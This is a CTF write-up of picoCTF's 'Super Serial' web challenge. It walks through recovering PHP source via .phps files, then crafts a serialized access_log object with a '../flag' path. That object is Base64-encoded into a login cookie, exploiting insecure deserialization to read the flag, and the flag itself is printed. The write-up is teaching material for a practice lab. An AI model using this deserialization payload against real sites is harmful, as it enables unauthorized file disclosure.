Introduction
Hey Amazing People!
Today we are going to go through an awesome capture the flag box created by my personal favorite MADSTACKS. He is one hell of a creator!! We are gonna take a look at Super Serial box(130pts) on PicoCTF in web exploitation section.
Given Details
Description
Try to recover the flag stored on this website http://mercury.picoctf.net:8404/
Hint: The flag is at ../flag
Let’s Dig In–
- On the login page we go.
- Look up robots.txt
- Found admin.phps
- opened admin.phps, however it says that file is missing.
- So I also tried appending phps to the index, and went to the source page.
- I used a php code to get the source code.
<?php
require_once("cookie.php");
if(isset($_POST["user"]) && isset($_POST["pass"])){
$con = new SQLite3("../users.db");
$username = $_POST["user"];
$password = $_POST["pass"];
$perm_res = new permissions($username, $password);
if ($perm_res->is_guest() || $perm_res->is_admin()) {
setcookie("login", urlencode(base64_encode(serialize($perm_res))), time() + (86400 * 30), "/");
header("Location: authentication.php");
die();
} else {
$msg = '<h6 class="text-center" style="color:red">Invalid Login.</h6>';
}
}
?>
- I discovered the authentication.php file and attempted to access it, but it displays Forbidden (not allowed)
- Consequently, tried authentication.phps and obtained a source code.
<?php
function __construct($lf) {
$this->log_file = $lf;
}
function __toString() {
return $this->read_log();
}
function append_to_log($data) {
file_put_contents($this->log_file, $data, FILE_APPEND);
}
function read_log() {
return file_get_contents($this->log_file);
}
}
require_once("cookie.php");
if(isset($perm) && $perm->is_admin()){
$msg = "Welcome admin";
$log = new access_log("access.log");
$log->append_to_log("Logged in at ".date("Y-m-d")."\n");
} else {
$msg = "Welcome guest";
}
?>
- So I noticed that cookie.php is in the second line.
- When I tried to get the source code using cookie.phps upon loading it and obtaining one, it reverted.
if(isset($COOKIE[“login”])){
try{
$perm = unserialize(base64_decode(urldecode($COOKIE[“login”])));
$g = $perm->is_guest();
$a = $perm->is_admin();
}
catch(Error $e){
die(“Deserialization error. ”.$perm);
}
}
?>
- The final section, where we are given cookie serialisation information, really attracted my attention. The cookie value is serialised after being URL encoded and Base64 encoded.
- On the online php editor, I pasted the authentication.php section.
script.php
<?php
class access_log
{
public $log_file;
function __construct($lf) {
$this->log_file = $lf;
}
function __toString() {
return $this->read_log();
}
function append_to_log($data) {
file_put_contents($this->log_file, $data, FILE_APPEND);
}
function read_log() {
return file_get_contents($this->log_file);
}
}
echo(serialize(new access_log("../flag")));
?>
- Because we need a serialised value of the access.log but don’t have authority to overwrite it, I inserted the last line. I then created a new access.log and proceeded as suggested by the hint by traversing the../flag directory.
- I got the result:
O:10:"access_log":1:{s:8:"log_file";s:7:"../flag";}
- Decoded to Base64 and got
TzoxMDoiYWNjZXNzX2xvZyI6MTp7czo4OiJsb2dfZmlsZSI7czo3OiIuLi9mbGFnIjt9
- Tried going to index.php and created a new cookie named “login” and value =TzoxMDoiYWNjZXNzX2xvZyI6MTp7czo4OiJsb2dfZmlsZSI7czo3OiIuLi9mbGFnIjt9 path=/authentication.php
- Refreshed the page and then the deserialization error got me the flag
### picoCTF{th15_vu1n_1s_5up3r_53r1ous_y4ll_c5123066}
Conclusion:
Try paying attention to small details and you will find wonders in them!!
Hit me up on Twitter for some Awesome oneliners to use for automating stuffs.
I hope you enjoyed the article. Lets Learn, Earn & Grow together with Infosec Community.
Give a Follow If you want more such content —
Twitter: https://twitter.com/0xManan/**_
LinkedIn: https://www.linkedin.com/in/manan-patel-4330101b4/**_**